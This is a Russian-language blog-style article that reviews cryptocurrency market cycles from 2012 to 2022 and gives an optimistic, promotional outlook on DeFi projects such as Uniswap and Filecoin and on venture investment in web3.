Следующийбуллран мы увидим по-крупному.
Каждый новый цикл ознаменовывался фундаментальными достижениями. Это служило ступенькой для следующего цикла.
Мы видели взлеты и падения, всплеск разнообразия в 2021 -м году, когда обрели популярность направления GameFi , NFT , Metaverse.
Хотя проекты, которые заложили этому фундамент: Axie Infinity , Sandbox Game , Decentraland , CryptoPunks — появились в периоде 2017 -2018 , а значит в период полного упадка предыдущего цикла.
Пофантазируем, что же нас ждет в следующем цикле, когда учтут открытия и ошибки 2021 -2022?
Раскрывая и иллюстрируя тезис выше, предлагаю вам немного ностальгии: ниже приводится краткий обзор знаменательных событий, начиная с цикла 2012.

Красочная история рыночных циклов​

Настоятельно рекомендую всматриваться в события и сопоставлять с реальным временем, даже на первый взгляд рисуются довольно интересные закономерности — мозг лучше понимает как на сферу влияют определенные ситуации. Я заботливо буду отмечать наиболее интересные моменты.

2012 - 2015: Хакеры, наркотики и зарождение Ethereum

​

В 2012 году криптовалютный рынок состоял практически только из биткоина. CoinMarketCap не существовал до конца 2013 года, позже отслеживал менее 30 монет.
Помимо торговли и обменов основным применением $BTC были онлайн-покупки товаров на таких сайтах, как Silk Road.
Silk Road — маркетплейс в даркнете, в большинстве, располагающий запрещенными товарами. Более 70% — наркотики, в остальном: оружие , детская порнография , фальшивые деньги и даже услуги киллера. Работал с 2011 по 2013 год.
В то время "Шелковый путь " был большой движущей силой в привлечении новых пользователей в сеть биткоина , да и в крипту в целом. А Mt. Gox , крупнейшая биржа $BTC , тогда отвечала за большую часть транзакций по всему миру.
Лейтмотивом этого цикла стало распространение новых криптовалютных бирж и кошельков. Несмотря на небольшой возраст сферы, предприниматели надеялись извлечь выгоду. Однако процессы, связанные с хранением и управлением такими активами, как $BTC , были относительно несуществующими, что привело к неоднократным взломам и краже более миллиона $BTC.
Многие из ранних эксплойтов, такие как [Linode](https://spectrum.ieee.org/thousands-of-bitcoins-stolen-in-a-hack- on-linode) и [Bitcoinica](https://arstechnica.com/uncategorized/2012/05/bitcoins- worth-87000-plundered/) , казалось, не оказали большого влияния на общую цену $BTC , поскольку цены продолжали расти в 2013 году.
Забавно наблюдать, как к определенному моменту рынок "перегревается", после, происходят события подобные коллапсу $LUNA , 3AC , Celcius и происходит переоценка ценностей.

"Фундамент" этого цикла разрушен. Черный пиар криптосферы захлебнулся, Silk Road пал в октябре 2013. Ощущения двоякие, но именно этот опыт здорово раскрыл возможность применения крипты и привел первых адептов.
Китай запретил $BTC , до того, как это стало мейнстримом.
Крупнейшая биржа Mt. Gox потеряла 850k $BTC пользовательских средств посредством взлома. На секундочку — $20,4 МЛРД, что больше капитализация $SOL + $DOT.
Цена $BTC упала на ~80 % в течение года после пика 16 декабря 2013 года. События повлекли конец этой бычьей фазы цикла. Снижение цен сопровождалось ослаблением доверия к этому классу активов, поскольку многие из новых участников покинули отрасль.
Те, кто остался, продолжали строить, разрабатывая сложные процедуры хранения для централизованных организаций и новые криптографические методы.
Средняя цена $BTC последующего медвежьего цикла ±300 $
Пожалуй, самым важным проектом, созданным во время спада цикла 2012 года, является Ethereum. Появился в 2015 -м, до 2017 года цена на $ETH колеблется в диапазоне от 1$ до 10$. Сегодня же Ethereum является фундаментом всей сферы криптовалют.
Его появление открыло возможности, выходящие за рамки отправки и получения цифровых активов. Зародилась новая эпоха — децентрализованные приложения. Ethereum открыл нам "умные контракты", это зародило направления, которые уже навсегда изменили наш мир: DeFi , DAO , Metaverse , GameFi , NFT. Только вдумайтесь, что с появления Эфириума не прошло и 10 лет.

Существующие проблемы, на которые указал даунтренд: ​

· Крипта , которая лежит не на вашем лэджере , вам не принадлежит (в 2022 -м мы словно только начинаем решать эту проблему)
· Нужны более безопасные и надежные биржи
· Для дальнейшего адопшена крипта не может быть просто “ценным активом ”, нужны какие-то реальные юзкейсы и новая инфраструктура/инструменты
· Децентрализация не защищает крипту от регуляций

Какие решения были предприняты: ​

· В 2014 появились аппаратные кошельки (и Trezor и Ledger)
· Coinbase и Gemini , биржа, запущенная в 2015 году, начали страховать депозиты своих пользователей
· В 2015 году был запущен Ethereum и явил миру смартконтракты
· В начале 2016 года был показан вайтпейпер Lighting Network
· В 2015 году был запущен Tether
· В 2016 году был запущен Metamask
· В начале 2016 года появились первые DAO
· Появились первые торговые площадки, например, Curve запустили в начале 2016 года
· На биржах начали появляться первые деривативы
· Появились объединения, лоббирующие интересы крипто индустрии. Первыми были Coincenter в 2014 , позже появились Blockchain Association
· Некоторые биржи начали менять свою юрисдикцию на ту, где осуществлялась мягкая политика регулирования в отношении криптовалют.
Вот так мы видим, что большинство привычных нам инструментов возникли как ответ на трудности с которыми индустрия столкнулась в прошлом.

2016 - 2019: Эра экспериментов. ICO и DeFi

​

В этот период настроения восстановились, Ethereum привнес в криптовалюту больше возможностей - сфера заиграла новыми красками. На этом фундаменте скорость зарождения новых проектов начала расти по экспоненте.
Закономерно, что возникли первичные предложения монет (ICO) и приобрели огромную популярность как в качестве инструментов для сбора средств, рекламы проектов и привлечения новых пользователей. Так и в качестве механизмов мошенничества.
Оглядываясь назад, мы понимаем, что популяризации нового раздела сферы криптовалют зачастую соответствует повышение мошеннической активности: период скамов в ICO 2017-го вполне можно сопоставить с таким же периодом в NFT в 2021-м. Видимо, это присуще натуре человечества. Мы лишь можем учиться на чужих ошибках и быть осторожными.
Пользователи коллективно вливали миллионы долларов в покупку токенов для поддержки идей и проектов, которые в конечном итоге никогда не были реализованы.
Во время пика эйфории проекты могли собрать стартовые раунды в размере $10МЛН + с веб-сайтом на коленке и неизвестной командой.
Кроме того, криптобиржа BitMEX запустила бессрочные свопы (perps) - инновационный фьючерсный продукт, не существующий на традиционных финансовых рынках, предоставляя трейдерам новые возможности для торговли с кредитным плечом.
Торговля токенами ICO только усугубила бешеную динамику цен.
С октября 2017 года по 2018 год макрофакторы вызвали распродажу развивающихся рынков и рисковых активов (т.е. криптовалют). ICO также стерло с рынка значительную долю рыночной капитализации и стоимости.
Феномен ICO отпугнул львиную долю аудитории от крипты, с другой стороны, этот период открыл врата проектам нового поколения , которые, в последствии, перевернули сферу.
Несмотря на семикратное падение, в этот период было запущено множество протоколов, которые сегодня представляют собой фундамент DeFi.
Например, Uniswap , концепция которого была теоретизирована годом ранее основателем Эфириума Виталиком Бутериным, был создан для того, чтобы позволить без разрешения обмениваться активами более эффективно, чем это было возможно ранее.
Aave , ставший одним из первых приложений, позволяющих вкладчикам получать проценты за счет децентрализованного кредитования с использованием смарт-контрактов и блокчейна.
Эти протоколы расширили полезность платформы Ethereum и стали основой-катализатором следующего криптоцикла, начавшегося в 2020 -м году, открывшегося с DeFi -Summer.

Проекты этого цикла.

Spoiler: Существующие проблемы, на которые указал даунтренд:

· Для защиты инвесторов необходимы некоторые действия со стороны регулирующих органов
· Инвесторы заинтересованы в проектах из финансового сектора
· ERC -20 примитив может/должен использоваться в искусстве
· Нужны другие фундаментальные проекты, помимо биткоина и эфира

Spoiler: Какие решения были предприняты:

· SEC заинтересовались криптовалютами и начали следствие с ICO
· Появились лэндинговые протоколы. Среди первых были AAVE и Compound
· В 2018 году был запущен $USDC
· Началось строительство инфраструктуры для DeFi
· Первые популярные NFT (Cryptokitties)
· Появились инструменты разработчика Web3 API/WEB3js и OpenZepplin
· Бум ICO привел к появлению большого количества скама, однако появились и такие проекты, как Polkadot , Bancor , Tezos , Filecoin , Binance.
· С того времени не было ни одного серьезного хака, “теневые ” биржи потеряли свою популярность , а безопасность существующих лучших крипто бирж находится на очень высоком уровне. (Исключение FTX , открывший уязвимость слепого доверия)

Во время бесконечного потока из FOMO и проектов-однодневок, в индустрии зародился фундамент, благодаря которому нам удалось привлечь сотни миллионов пользователей.

2020 - настоящее время: займы, мейнстрим и стресс-тест

DeFi ​

Текст ниже может показаться слегка сложным, но он принесет понимание происходящего в этом цикле, поможет извлечь урок из чужих ошибок, поэтому я постарался раскрыть некоторые моменты простыми словами.
Нынешний цикл - это**сага о кредитном плече.**
Между ростом популярности бессрочных свопов и запуском Чикагской товарной биржей (CME) фьючерсов на $BTC. инвесторов побудили начать использовать кредитное плечо, поскольку государственные расходы в ответ на пандемию COVID-19 поддержали экономику.
Бессрочный своп можно воспринимать как фьючерс без срока погашения и с иной ставкой финансирования.
Так сложилось, что приток новых денег благоприятно влияет на крипторынок, многие стараются на этом дополнительно спекулировать используя кредитное плечо.
Кредитное плечо позволяет увеличить собственную позицию заемными средствами, отношение может доходить от 1-го к нескольким сотням.
Это прибыльный инструмент, но он несет соответсвующий риск потерять все при малейшем колебании цены.
$BTC достиг первого пика в $64,8 тыс 14 апреля 2021 года , но его цена снизилась из-за высокого левериджа от бессрочных свопов и других деривативов *.
*Другими словами, люди занимали больше денег, чем у них есть в обеспечении и вставали в лонг. Это оказывает огромнейшее давление на рынок - мешает его росту, проще ликвидировать такие позиции, чтобы расти дальше. Это может происходить произвольно: на рынок перестает приходить достаточное количество игроков, чтобы поддерживать столько лонгов.
Ставки финансирования - периодические платежи между трейдерами для выравнивания фьючерсной цены с ценой спотовой - были положительными, что указывало на то, что рынок непропорционально преобладал позициями лонг.
Трейдеры продолжали наращивать свои позиции, используя криптовалюту в качестве залога. Цены на обеспечение упали , что вызвало принудительные продажи и каскады ликвидации, в результате чего летом 2021 года $BTC упал до $29 тыс.
К концу лета, казалось бы, рынок извлек уроки из предыдущих ошибок. Открытый интерес стал снова расти уже более умеренно.
CeFi -платформы и хедж -фонды активнее всех использовали кредитное плечо в этом периоде. Отсутствие прозрачности в деятельности этих компаний привело ко второй волне злоупотребления займами, продолжаясь вплоть до ATH $BTC в $68,9 тыс 10 ноября 2021 года.
CeFi - централизованные финансы, эту категорию часто соотносят с биржами, например, на них также можно стейкать токены и получать доходность. Но в эту категорию также входят агрегаторы доходности вроде Anchor , деятельность которых, в отличие от DeFi , не прозрачна и поддается централизованному влиянию. Считается, что преимущество CeFi перед DeFi в безопасности и простоте, ибо обязательства по сохранности на себя берет централизованный орган. Но не все так просто
Хедж- фонды - это инвест. фонды, целью которых можно назвать извлечение прибыли при любых рыночных условиях. Для этого существует широкий финансовый инструментарий, в т.ч. кредитное плечо, и различные рыночные стратегии. Такие фонды зачастую ограничены лишь слабым нормативным регулированием, либо не регулируются вовсе. К слову,**3AC - хедж- фонд. **Традиционные фонды жестко регулируются, поэтому часто ограничиваются лишь куплей-продажей активов.
CeFi предлагали пользователям доходность около 3 -8 % APY. Использовали средства пользователей, чтобы повысить доходность ради собственной рекламы, еще хуже, когда дополнительно использовалось кредитное плечо. В период расцветка рынка это было легко сделать.
На радаре появился протокол Anchor , предложивший доходность в ±20 %.
Вспомним тягу хедж-фондов к максимизации прибыли : с помощью стратегии перезайма и кредитного плеча они разгоняли доходность вплоть до 100 %, естественно, это повышало риск.
Вне сферы криптовалют мир окутывали экономические проблемы. В игру вступает ФРС , повышая процентные ставки из-за опасений по поводу инфляции. Цены стали падать во второй раз за этот цикл.
Волатильность ликвидировала множество позиций, наказав за использование рискованных инструментов. Это вылилось в целую лавину.
Все началось с краха Terra (UST). Он стер с криптовалютного рынка более $35 млрд.
Затем случился анпег Lido , ликвидных ставок на $ETH , позволяющих извлекать из него доходность. Не обошлось без участия кредитного плеча.
Естественно, это вызвало каскад ликвидаций, который разросся настолько широко, что и по сей день имеет свои последствия.
После случился кризис FTX , Alameda , CDG , который здесь и сейчас влияет на индустрию, о чем я расскажу позже.
Этот хаос обнажил множество проблем, и одновременно стал оплотом фундаментальных проектов в DeFi , которые послужили толчком к росту отрасли, продолжали работать должным образом.
В отличие от своих централизованных аналогов, смарт-контракты Aave , Compound и MakerDAO оставались устойчивыми к рынку.
Uniswap продолжает обрабатывать объемы обменов в десятки миллиардов долларов.

Каждое падение вызываетрефлексию , заставляет задуматься: действительно ли эта сфера инновационная , есть ли у нее будущее или это попросту спекуляции?

Click to expand...

Вполне закономерно полагать, чем сильнее падение , тем большая значимость у проблемы вызвавшей его, это непосредственно помешало дальнейшему развитию.
Последующие проекты должны уже включать ее решение , способные на это и рождают инновационные продукты , которые катализируют дальнейший рост.

Сфера учится на своих ошибках и открытиях.​

Этот период запомнился не только проблемой кредитного плеча, он дал нам возможность заглянуть в будущее расширенного utility криптовалют. Зерна прошлого цикла проросли: успехи NFT , GameFi , Metaverse и DeFi проектов привели в сферу огромнейшее число билдеров, причем уже из мира мейнстрима.
Чего только стоит ребрендинг Facebook в Meta , официальный визит Sequoia Capital в криптосферу и бесчисленное количество брендов и стран, начавших возделывать технологии web3. Очевидно, что большинство отсеется, но те продукты, которые смогут выстоять и выгравировать свою идею до блеска, — в следующем цикле станут звездами пославшими огонь в глаза людей.

Spoiler: Существующие проблемы, выводы и открытия, на которые указал цикл:

· Деятельность ключевых игроков рынка должна быть более прозрачной.
· У пользователей должна быть возможность предоставлять свои репутационные данные, по типу кредитной истории, ончейн, что позволит протоколам выдавать займы с частичным обеспечением (undercollateralized lending). Как вариант, использование [Soulbound](https://www.coindesk.com/learn/what-are-soulbound- tokens-the-non-transferrable-nft-explained/) NFT.
· Он-чейн системы репутации, по типу Lens Protocol и ENS.
· Более совершенные системы лендинга, базирующая на надежных смартконтрактах
· Настоящая децентрализация: Вся сфера он-чейн финансов должна быть открытой и аудируемой.
· DAO нужны реформы, поскольку в топовых DAO более 90% голосов принадлежат 1% пользователей.
· Алгостейблы не работают, держитесь от них подальше
· Если вам кажется, что APR на площадке выглядит оторванным от реальности, значит, скорее всего, так оно и есть: протоколам следует сфокусироваться на реальной экономической модели с доходами, которые обеспечиваются реальной деятельностью на площадке
· NFT в данный момент в основном являются либо артом либо спекуляцией: NFT для дальнейшего развития нужно какое-то утилити (внутриигровая ценность, использование на децентрализованных социальных площадках, он-чейн верификация и т.д.)
· Привлечение в криптосферу новых пользователей и создание лучших условий для действующих пользователей: создание юзер френдли мобильных децентрализованных приложений , создание удобного интерфейса для доступа к L2 решениям, больше приложений, связанных с реальной жизнью пользователей.
· Запуск приложений, позволяющих, например, осуществлять стриминговые платежи, спонсирование научной деятельности, регенеративные финансы, предоставляющие возможность взять заём под залог реального актива и т.д.
· Проблемы кросс-чейн безопасности: разработчикам следует сфокусироваться на развитии более безопасных моделей кросс-чейн передачи сообщений (таких, как например IBC в экосистеме Cosmos).
· Развитие и укрепление существующих L1 решений
· Образование криптопользователей для перехода в ончейн-пространство, популяризация и упрощение использования некастодиальных кошельков.

Постепенный переход из CeFi в DeFi , уже пользуется спросом смежное направление, с регуляцией и защитой пользователей (например, от хаков) от CeFi и децентрализация, your keys - your money от DeFi.
Естественно, информация выше - на вес золота. Только что вы получили методичку из проб и ошибок прошлого, направлений, к которым стоит присматриваться уже сейчас. Но это не все
Сферы с большим потенциалам роста в будущем цикле от команды Messari :

• GameFi

• Децентрализованные соц. сети

• Стриминговые платежи

• Mobile GameFi

• DeSci - децентрализованная наука

• Regenerative finance и некоторые другие

• Перед тем, как подойти к переоценке ценностей, предлагаю взглянуть на наболевшие ситуации с другой стороны.
  2022-й год полон падений и разочарований (также он несет в себе открытия и победы о которых мы поговорим позже).
  Но если взглянуть на нынешние события в контексте вышепрочитанного, возникает простая мысль: " мы стали сильнее".
  Большинство крахов криптовалют — только укрепили ее истинную ценность.
  События с $LUNA , $UST — это начало полноценного чекапа крипторынка , обнаружения и профилактики болезней , которые могли бы убить организм.
  Интересно, что FTX , DCG , 3AC и даже LUNA — отражают проблемы доверия.
  Что забавно, абсолютно все крахи и компании-участники между собой связаны:
  Крах LUNA -> Крах 3AC (игрались с стейкингом $UST , холдили $LUNA , прокручивали $GBTC) -> крах FTX (крутили с $GBTC , кредиторы 3AC), -> тяжбы с DCG (описанные FTX и 3AC)
  С $LUNA и $UST мы помним, что система дала сбой и взаимно ликвидировалась: необоснованно высокий APY привлекал новые деньги, играющиеся с рисками хедж -фонды разгоняли APY до сотни процентов, с помощью кредитного плеча раздувая пузырь.
  Признаки провальности системы всплывали за несколько месяцев до краха. Снова слепая жадность и кредитное плечо. Конечно, возникшая лавина задела упомянутые хедж -фонды …
  …Одним из них оказался 3AC , тоже масштабный конфликт, миллиардные потери и долги, продажа долей криптопроектов на OTC , дамп оставшихся.
  Что касается FTX , $GBTC (DCG), ситуация :
  Эти два краха можно было бы избежать — заимев криптокошелек и научившись им распоряжаться: большинство клиентов FTX просто хранили там средства, да, удобно конвертировать крипту во что-то другое. Да, вроде кажется, что легче доверять именитой бирже , чем какой-то мошеннической криптовалюте , тут же не обманут.
  Реальность обратная , FTX распоряжались клиентскими средствами для своих многочисленных махинаций.
  Беда $GBTC — еще более "абсурдная ". Это продукт, который позволяет купить $BTC не покупая реальный $BTC , а покупая бумажку о владении трастом, который владеет реальными $BTC.
  Условно, это проблемы отсутствия регуляции, когда большие деньги достаточно сложно напрямую занести в $BTC , но и довольно часто играет классическое человеческое — лень разбираться. За возможность купить $BTC люди платят 2% в год , что хуже, они не могут его сиюминутно обналичить , под чем подписываются.
  И это очевидная проблема доверия, когда доверие на себя перетягивает бренд , остается человеческий фактор махинаций.
  Криптовалюта же открывает возможности этого избежать.
  Открывается проблема отсутствия регуляции и образования. Другими словами, с каждым днем криптосреда будет становиться прозрачнее , технологии и инновации встанут на первое место , ведь попросту пропадут возможности мошенничества.
  Главное, чтобы люди понимали, что проблема не в криптовалюте, а в людях, которые наживаются на чужом доверии, непонимании и страхах.
  Чтобы добавить баланса, внесу на чашу весов интересные новости датированные неделей до выхода статьи:
  Goldman Sachs[объявили](https://www.reuters.com/technology/goldman-sachs- hunt-bargain-crypto-firms-after-ftx-fiasco-2022-12-06/) охоту на выгодные криптосделки на фоне краха FTX.
  По словам главы отдела цифровых активов Goldman Sachs Мэтью Макдермотта, скандал с FTX не только не снизил, но и, напротив, усилил потребность в более надежных, прозрачных и регулируемых компаниях на рынке криптовалют.
  «Мы видим некоторые действительно интересные возможности [для инвестирования в криптобизнес] по гораздо более разумной цене», — сказал Макдермотт.
  Платежный гигант Stripe (оценка $95МЛРД) [запускает](https://techcrunch.com/2022/12/02/stripe-announces-fiat-to- crypto-onramp-widget/) продукт для конвертации фиата в криптовалюту.
  Stripe обеспечивает решение по принятию платежей в интернете — обрабатывает 200+ миллионов запросов транзакций каждые сутки.
  Другими словами, это проводник платежей привычного нам мира без криптовалют. Чтобы сделать покупку, пользователь сначала сталкивается с Stripe , а потом уже с Mastercard , Visa e.t.c.
  У криптовалют есть простая боль: а где эту криптовалюту вообще взять?
  Такой гигант как Stripe , навсегда способен решить эту проблему, читая статью дальше, вы глубже раскроете эту мысль, обнаружив, что Mastercard и Visa имеют схожие цели.
  Что интересно, если Stripe добавит криптовалюту еще как форму оплаты, это навсегда изменит индустрию и продвинет ее на несколько лет вперед.
  Telegram добавил NFT -Username , это все слышали, но теперь можно заиметь и NFT -номер, чтобы зарегистрироваться на платформе.
  В статье я рассказал, что сейчас достаточно простой сим -карты без интернета, чтобы совершать криптотранзакции, это давно практикуется в Африке , а теперь и в Украине.
  Постепенно мессенджер идет к разработке полноценной крипто-экосистемы, с собственным DEX. Такие формулировки мы видели часто, но от платформы с 700 миллионов пользователей это имеет настоящий вес.
  Именитый Артур Хейс в первой половине декабря заявил , что цена $BTC достигла минимума текущего цикла, поскольку почти у всех «безответственных организаций» биткоины закончились для продажи.
  Мнение о перспективах крипторынка поменялись? Это только начало, ведь включены новости лишь за последнюю неделю, перейдем же к тому, чему я уделил четыре месяца , поехали!

Катарсис​

Ка́та́рсис (др.-греч. κάθαρσις — «возвышение, очищение, оздоровление») — процесс высвобождения эмоций, разрешения внутренних конфликтов и нравственного возвышения.
Рынки цикличны и поддаются неосязаемым закономерностям. Каждый новый цикл ознаменован толчком индустрии и приливом интереса к ней. Хоть мы и находимся в нисходящем тренде , за первые полгода 2022 -го было привлечено инвестиций больше , чем за весь бычий 2021 -й.
Скажу больше, с момента моей последней статьи о рынке, где я давал ревью произошедшего за 1-й квартал этого года, объем инвестиций в крипту в 22 -м вырос в ±4 раза.
Ниже я приведу несколько выборочных примеров рыночных явлений, которые помогут посмотреть на все под другим углом, что подготовит тебя, моего читателя, к основным смыслам данной статьи.
Знание о том, какие события происходят в период медвежьих рынков вполне способны навести на ответ к вопросу: "почему так?".
Важно наблюдать со стороны каких результатов сфера достигла в столь короткий промежуток времени. Громкие падения в итоге стимулировали более буйный рост.
Ведущие инвесторы извлекли уроки из предыдущих циклов и вовсе не хотят медлить, упуская, возможно, лучшие инвестиционные возможности будущего десятилетия :
В февралеSequoia Cap[собрали](https://techcrunch.com/2022/04/27/crypto- focused-dragonfly-capital-launches-650m-third-fund/) $600 миллионов в свой первый (!!!) криптофонд. Тем самым громко заявив о своем присутствии
В апреле dragonfly [привлекли](https://techcrunch.com/2022/04/27/crypto- focused-dragonfly-capital-launches-650m-third-fund/) $650 миллионов для третьего криптофонда. Я считаю их сейчас лучшим web3-фондом, каждому, кто желает глубже развиться в понимании и заработке в сфере, вырваться из череды мимолетных профитов, выйти за рамки простого пользователя - стоит следить за этими ребятами и пытаться понять их действия. И скоро я расскажу почему я так считаю.
Май, a16zпривлекают рекордные $4.5 миллиарда к своему скромному четвертому фонду.
За 2022 -й фонды привлекли ±$55МЛРД на инвестиции в web3.
Учтем, что многие сборы еще не закрыты и не опубликованы (а там много чего интересного, даже от вышеупомянутых фондов, которые совсем недавно собрали деньги), многие все еще собирают, т.к. растянули сборы из-за кондиций рынка и ситуации с FTX:
Pantera Capital [собирает](https://www.coindesk.com/business/2022/09/28/crypto-vc-pantera- capital-looks-to-raise-125b-for-second-blockchain-fund-report/) $1.25МЛРД на инвестиции в web3.
И подобных незакрытых сборов предостаточно.
Лидеры сферы ежегодно жадно наращивают объемы инвестиций, и на **" неудачном рынке" бьют рекорды по объемам. **Наводит на мысли? Неужели это прибыльно?
Вопрос открытый, я его подслащу тем, что я перечислил только своих любимчиков.
Я напомню насколько ~~это мало~~ мы рано с помощью одной из своих любимых диаграмм по отдельному (!!!) направлению крипты.

Мы ознакомились с происходящим в прошлом:мы падали, это делало нас сильнее... , сейчас же мы заглянем в настоящее , чтобы увидеть проявившиеся на фоне новых знаний ( о циклах ) возможности.
Стремительными шагами мы продолжаем экспансию: несмотря на падение главной криптовалюты, объем средств, переведенный в сети bitcoin , бьет рекорды — половины 2022 -го было достаточно, чтобы покорить новую вершину. Люди активнее пользуются благами блокчейна и склонны больше ему доверять.
С другой стороны, июнь 2022 -го года стал рекордным по показателю вывода $BTC с централизованных бирж.

Декабрь 2022 -го, рекорд снова побит. За 30 дней рекордные 200.000 $BTC — $3.4МЛРД.
Это наводит на несколько выводов:
Люди наименьшим образом склонны к продаже - наибольшим к HODL.
Доверие к CeFi снизилось. Но у high -tier инвесторов этот сегмент на первом месте , читай дальше, чтобы узнать почему.
Инвесторы воспользовались возможность увеличить свои позиции. (BTC-адреса с балансом находятся на историческом пике).

Интересно отметить, что несмотря на коллапсы в непрозрачном CeFi (3ac , anchor , celsius, ftx, cdg e.t.c.). Сектор DeFi не только выстоял, но и увеличил свои позиции с начала года. Они работают автономно, как им диктует код, невозможно вмешаться и что-либо обойти (избежать ликвидации).
Это позволило участникам рынка подготовиться и адаптироваться к потенциальному каскаду ликвидаций.
Другими словами, сегмент пережил стресс -тест , тест -драйв (мы помним, что крипта стремится к массадопшну , и нужно быть готовым к экспоненциальному повышению количества участников рынка).
Что только укрепило позиции DeFi , поэтому момент, когда мы вернемся к верхним значениям TVL и trading volume - лишь вопрос времени.
_Находясь в криптосфере, даже простомупользователю необходимо осязать уровень развития важнейших сегментов вроде DeFi , и положение их лидеров. Это столь же необходимо , как осознавать лево - или правостороннее движение в стране, в которой находишься: без этого ваше путешествие рискует оказаться безыдейным , слепым и даже опасным. _
Мы тезисно пройдемся по лидеру DeFi -сегмента - top-1 DEX Uniswap.

Uniswap​

Ведущие игроки жадно накапливают $UNI с начала этого непростого года, почему?

Более 1-го $ТРЛН — [объем торгов](https://cointelegraph.com/news/uniswap- breaks-1t-in-volume-but-has-only-been-used-by-3-9m-addresses) на Uniswap.
У Uniswap почти в 5,5 раз [больше](https://www.paradigm.xyz/2022/05/the- dominance-of-uniswap-v3-liquidity) ликвидности, чем у Binance - крупнейшей в мире криптобиржи - на парах USDC/USDT.

Торговые объемы Uniswap сравниваются с Coinbase (А это проводники китов США в крипторынок, значительный процент их объемов - институциональные сделки).

Это все здорово, но зачем мне это знать?
Не стоит воспринимать слова ниже как призыв к действию — но они могут стать хорошим фундаментом для принятия серьезных решений.
Uniswap вполне можно считать эталонным проектом криптосферы. Он включает в себя множество причин, почему так считать закономерно: проект децентрализованный, прошел через огонь и воду и является лидером индустрии.

И чтобы не быть голословным — обратимся к терминологии: Эталон — средство измерения.

Click to expand...

Другими словами, изучая положение Uniswap , мы можем оценивать положение криптоиндустрии здесь и сейчас и даже заглядывать вперед.
Если цена $BTC , как самого популярного актива, отражает настроение рынка — интерес к нему со стороны общественности, веру в идеи. Его цена постоянно меняется , хотя он сам — практически нет.
То Uniswap — кровеносная система крипторынка. Его состояние отражает — настоящее положение дел , без лишних эмоций.
Проект является отражением идей криптосферы , когда сегмент CeFi — скорее обслуживают идеи криптовалют : они не децентрализованны, не прозрачны, но упрощают доступ к рынку для более широкого круга пользователей.
Ликвидность Uniswap больше, чем суммарно у двух крупнейших бирж (Binance & Coinbase), торговые объемы сравниваются с одной из них, протокол работает 24/7 и на него никто не влияет. Его метрики продолжают расти, он масштабируется — организуя**[многомиллиардное](https://www.axios.com/2022/08/05/uniswap-looks- to-spend-some-of-its-giant-treasury)** DAO , запуская собственный инвест. фонд.
На этом примере мы видим, что несмотря на падения, вера в криптосферу только усилилась, сильные проекты индустрии наращивают экспансию.
На фоне всеобщей паники здоровоостановиться, осознать происходящее, чтобы увидеть невероятные возможности.

И когда мы видим, что ведущие сегменты и их проекты чувствуют себя замечательно , — это вполне хороший звоночек пересмотреть свой инвест. тезис, пока метрики крипторынка далеко от своих ATH.
Как говорилось ранее — лучшего времени для действий не найти , — как для изучения, так и для активного участия.
Рынок спокоен , конкуренция низкая , что только благоволит к тому, чтобы к следующему циклу выйти во всеоружии : с охапкой бриллиантов на продажу или с подготовленным оборудованием по их добыче.
Всего за декаду мы начинали от стресс -тестов идей децентрализованного обмена ценностью (bitcoin), застав рассвет надстройки над этой идеей (Ethereum), позволившей создавать децентрализованные приложения , сегодня же это развилось до рынка метавселенных , который уже насчитывает сотни тысяч пользователей и десятки миллиардов долларов.

Удивительно видеть безверие на этом поприще.

Конечно, существуют еще сотни, может тысячи проблем, которые следует решить, чтобы раскрыть потенциал технологий: одной из таких проблем является вопрос истинной децентрализации.
Мы все равно от кого-либо продолжаем зависеть : централизованные хостинги сайтов, хранилища данных, сервера.
Например, большинство нод сети Ethereum и Solana расположены у централизованных провайдеров услуг. Причем у Ethereum 53,7% приходится только на Amazon. Что дает теоретическую возможность компании Amazon влиять на работоспособность сети Ethereum. И еще более теоретическую — совершить [атаку 51](https://ru.beincrypto.com/chto- takoe-ataka-51-i-chego-boyatsya-investoram/) .
Ряд блокировок веб-интерфейсов, санкционный список кошельков и прочее также являются примерами недостатка децентрализации.
Но, как мы уже поняли, крипто-циклы — это есть процессы обнаружения и решения проблем.
И на этом поприще есть прогресс:
Важным подсектором криптовалютных рынков является децентрализованная инфраструктура.
Зародившийся в 2014 -м, инициированный в 2017 -м при поддержке A16Z , Sequoia Cap , старожил рынка находяшийся в топ -50 , Filecoin — эталонный пример проекта данного сегмента.
Проект решает проблему децентрализованного хранения данных. А данные = фундамент , и если кто-то посторонний может ими завладеть или даже в них вмешаться — это постоянный риск потерять все.
В июне 2021 года запустила обновление hyperdrive , в результате чего пропускная способность транзакций увеличилась в 10 -25 раз.
На графике ниже показано, что после обновления сети доход протокола снизился, несмотря на экспоненциальный рост использования сети (Daily Active Deals).
Хотя доходы от протокола важны, развитие не всегда зависит от них. В случае с Filecoin это обновление позволило масштабировать сеть, чтобы продолжать предоставлять файловое хранилище за (!!!!!)
0,001% от стоимости файлового хранилища Amazon AWS.

Это доказывает, что сфера богата представителями, стоящими на ее защите.
Великие фонды понимают , что децентрализация уже неизбежна , поэтому стремятся быть первыми , кто ее поддержал и на этом заработал.
Filecoin привлекли рекордные 200 $МЛН за объективно перегретый 2017 -й год, и даже на нижних границах рынка они оцениваются более, чем в 1.5 $МЛРД , доходя до $12МЛРД в пике.
Забавно, что Filecoin — это кейс одной из первых инвестиций Sequoia Cap в крипторынок.
Спустя пять лет они официально вошли в крипту с первым запущенным фондом, инвестируя сотни миллионов во время паники на рынках. Интересен масштаб их инвестиций сейчас? Есть о чем рассказать, идем дальше.
Мне было приятно поддержать несколько проектов с бейкерами в виде Sequoia Cap , инвестируя в том же раунде.
Мы проинспектировали волатильный , но непокорный тренд развития идей криптовалют. Серьезные ошибки сменялись гениальными решениями , колоссальные падения — более масштабным ростом.
Нам повезло застать меняющую жизнь эпоху, сопоставимую с развитием интернета в 90 -х, находясь рано, мы урвали лакомый кусочек возможности определить всю будущую жизнь.
От [искренней радости,](https://www.forbes.com/sites/rufaskamau/2022/05/09/what-is- bitcoin-pizza-day-and-why-does-the-community-celebrate-on- may-22/#:~:text=He%20spent%2010%2C000%20Bitcoin%20to,the%20two%20pizzas%20and%20delivered.)в узком круге посвященных, за возможность приобрести пиццу за 10.000 $BTC , мы пришли к стремительно-растущей триллионной экосистеме, уже**[вовлекающей государства](https://consensys.net/blog/enterprise-blockchain/which- governments-are-using-blockchain-right-now/) , которой хоть и сопутствует множество проблем , оглянувшись назад, и заглянув немного вперед, мы убедились , что они решаемы.
Я поделюсь выводами по теме от команды Grayscale , на материалы которых я неоднократно опирался, и мы воодушевленно перейдем к более предметному разговору о событиях насущных, чтобы понять, что делать здесь и сейчас.
